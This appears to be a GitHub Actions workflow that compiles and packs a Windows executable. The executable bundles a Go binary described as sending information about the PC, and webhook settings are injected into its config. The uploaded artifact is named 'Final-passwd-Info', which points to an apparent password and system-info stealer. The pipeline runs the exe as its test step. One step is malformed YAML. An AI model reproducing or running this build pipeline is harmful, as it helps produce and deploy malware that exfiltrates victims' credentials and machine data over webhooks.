name: Build exe

on:
  workflow_dispatch:

  push:
    branches:
      - main
  pull_request:

jobs:
  build-and-test:
    runs-on: windows-latest

    steps:
      # Step 1: Checkout code
      - name: Checkout code
        uses: actions/checkout@v3

      # Step 2: Set up Go
      - name: Set up Go
        uses: actions/setup-go@v4
        with:
          go-version: 1.21

      # Step 3: Set up python
      - name: Set up python
        uses: actions/setup-python@v4
        with:
          python-version: 3.11

      # Step 4: Install Upx and MinGw for compression
      - name: Install UPX and MinGw
        run: choco install upx mingw -y

      # Step 5: Setup webhoos in config.go and config.py
      - name: setup webhooks
        run: python setup.py

      # Step 6: Download go depndencies like hardware.
      - name: Download Go dependencies
        run: go mod tidy

      # Step 7: Build SysInfo.exe; this will send Information about the pc.
      - name: Build Go shared library
        run: go build -o SysInfo.exe

      # Setp 8: Remove build logs from SysInfo.exe and compress it using UPX
      - name: strip the exe file
        run: |
          strip SysInfo.exe

      # Step 8: Install python packages requird by main.py
      - name: Install python dependencies
        run: python -m pip install pywin32 requests pycryptodomex pyinstaller

      # Step 9: Build the Exe from main.py using pyinstaller
      - name: build exe from main.py
        run: pyinstaller --onefile --add-data "SysInfo.exe;." main.py

      # Step 10: Uoload the exe file as an adtifact
      - name: Upload build artifact
        uses: actions/upload-artifact@v3
        with:
          name: Final-passwd-Info
          path: |
              ./dist/main.exe

      -name: Test Exe
        run: .\dist\main.exe
